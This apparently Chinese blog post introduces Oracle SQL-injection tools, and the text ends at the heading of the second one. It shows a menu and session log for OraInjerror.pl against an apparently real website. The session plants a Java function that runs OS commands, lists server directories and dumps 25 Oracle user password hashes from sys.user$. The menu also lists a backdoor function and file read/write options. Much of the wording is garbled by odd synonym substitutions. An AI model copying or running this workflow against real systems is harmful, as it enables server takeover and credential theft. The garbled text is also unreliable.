三种不需要盲注的oracle注入工具








第一种,需要有犯错显示



E:\tools OraInjerror.pl www.mic../index.phpid421





Oracle Injection with Display errors

v0.8 beta



1.获取体系信息

2.履行SQL语句

3.执行本地SQL脚本

4.植入linxruncmd()函数

5.获取当前用户表

6.获取指定表的字段

7.获取数据表内容

8.进入cmd模式(需要植入函数胜利)

search.字段模式匹配

pwd.枚举用户hash

read.调用utl_file读文件

write.调用utl_file写文件

down.Oracle植入下载函数oradownload()

backdoor.植入函数SQLEXEC()

link.创建链接服务器

q.退出到上级菜单

0.显示辅助信息

# 1

服务器监听IP:192.168.2.9

服务器机器名:www..soft.

WEB 服务器IP:192.168.2.8

WEB 机器名称:www..soft.

客户启动账,:apache

当前用户名称:NARU

权限是否 DBA:FALSE

当前数据库名:GJDB

数据库实例名:GJDB

数据库装置 :/oradata/GJDB/redo03.log

数据库版本,:TNS for Linux: Version 10.2.0.1.0 Production

# 5

正在枚举当前用户表名

材料清单数量:11

正在获取第1条记录:SHOW_TEST

正在获取第2条记录:LEASE

正在获取第3条记录:SHOW

正在获取第4条记录:ZIPCODE

正在获取第5条记录:TBLPOLL

正在获取第6条记录:TBL_IMG

正在获取第7条记录:SMSMESSAGE

正在获取第8条记录:FLASH

正在获取第9条记载:TBLCOUNTER

正在获取第10条记录:SHOW1

正在获取第11条记录:LEASEJUN

# 4

创立java包

服务器回应:Success.

赋予public执行java io权限

服务器回应:Success.

树立函数linxruncmd()

服务器回应:Success.

赋予public对linxruncmd的权限

服务器回应:Success.



# 8

OSCMD /bin/ls

hc_GJDB.dat

init.ora

initGJDB.ora

initdw.ora

lkGJDB

orapwGJDB

spfileGJDB.ora



OSCMD /bin/ls /

bin

boot

data

data1

dev

etc

home

initrd

lib

lib64

lost+found

media

misc

mnt

myputer

opt

oradata

proc

root

sbin

selinux

sqlnet.log

srv

sys

tftpboot

tmp

usr

var



OSCMD q

# search

Keyword password

正在搜寻字段名含有要害字password的表

这样的表共有:0

# admin

# search

Keyword admin

正在搜索字段名含有关键字admin的表

这样的表共有:0

# pwd

表sys.user$ where type23 0 and length(password)16中的记录数目:25

正在获取第1条记录:SYS'5638228DAF52805F

正在获取第2条记录:SYSTEM'D4DF7931AB130E37

正在获取第3条记录:OUTLN'4A3BA55E08595C81

正在获取第4条记录:DIP'CE4A36B8E06CA59C

正在获取第5条记录:DMSYS'BFBA5A553FD9E28A

正在获取第6条记录:TSMSYS'3DF26A8B17D0F29F

正在获取第7条记录:DBSNMP'E066D214D5421CCC

正在获取第8条记录:WMSYS'7C9BA362F8314299

正在获取第9条记录:EXFSYS'66F4EF5650C20355

正在获取第10条记录:CTXSYS'71E687F036AD56E5

正在获取第11条记录:XDB'88D8364765FCE6AF

正在获取第12条记录:OLAPSYS'3FB8EF9DB538647C

正在获取第13条记录:ORDSYS'7EFA02EC7EA6B86F

正在获取第14条记录:ORDPLUGINS'88A2B2C183431F00

正在获取第15条记录:SI_INFORMTN_SCHEMA'84B8CBCA4D477FA3

正在获取第16条记录:MDSYS'72979A94BAD2AF80

正在获取第17条记录:SYSMAN'447B729161192C24

正在获取第18条记录:MDDATA'DF02A496267DEE66

正在获取第19条记录:GJ_AUDIT'F908F53DF6507797

正在获取第20条记录:MGMT_VIEW'442167C25FAC883C

正在获取第21条记录:SCOTT'F894844C34402B67

正在获取第22条记载:FMC_USER'C2C1B67EC7F525AB

正在获取第23条记录:SMS'23C574F5509AEC3A

正在获取第24条记录:NARU'74A0C14CEC9C635A

正在获取第25条记录:SEOULCULTURE'99FEAAE16D228ED1

# search

Keyword pass

正在搜索字段名含有症结字pass的表

这样的表共有:8

正在获取第1条记录:BIN$RNczTeOGUHLgQKjACQJEHw$0

正在获取第2条记录:BIN$gNG02WYik5XgQKjACQI7Sw$0

正在获取第3条记录:BIN$gNG06OKzqVTgQKjACQI7Yg$0

正在获取第4条记录:BIN$gNG1ICF1YgLgQKjACQI68g$0

正在获取第5条记录:BIN$gNG1J5gq+33gQKjACQI69A$0

正在获取第6条记录:BIN$gNG1L1hzfOvgQKjACQI7Ww$0

正在获取第7条记录:BIN$gNG1OQnTjYbgQKjACQI7Zg$0

正在获取第8条记录:BIN$gNG1QW9XqArgQKjACQI7Vw$0



第二种不须要过错显示
09-19 14:29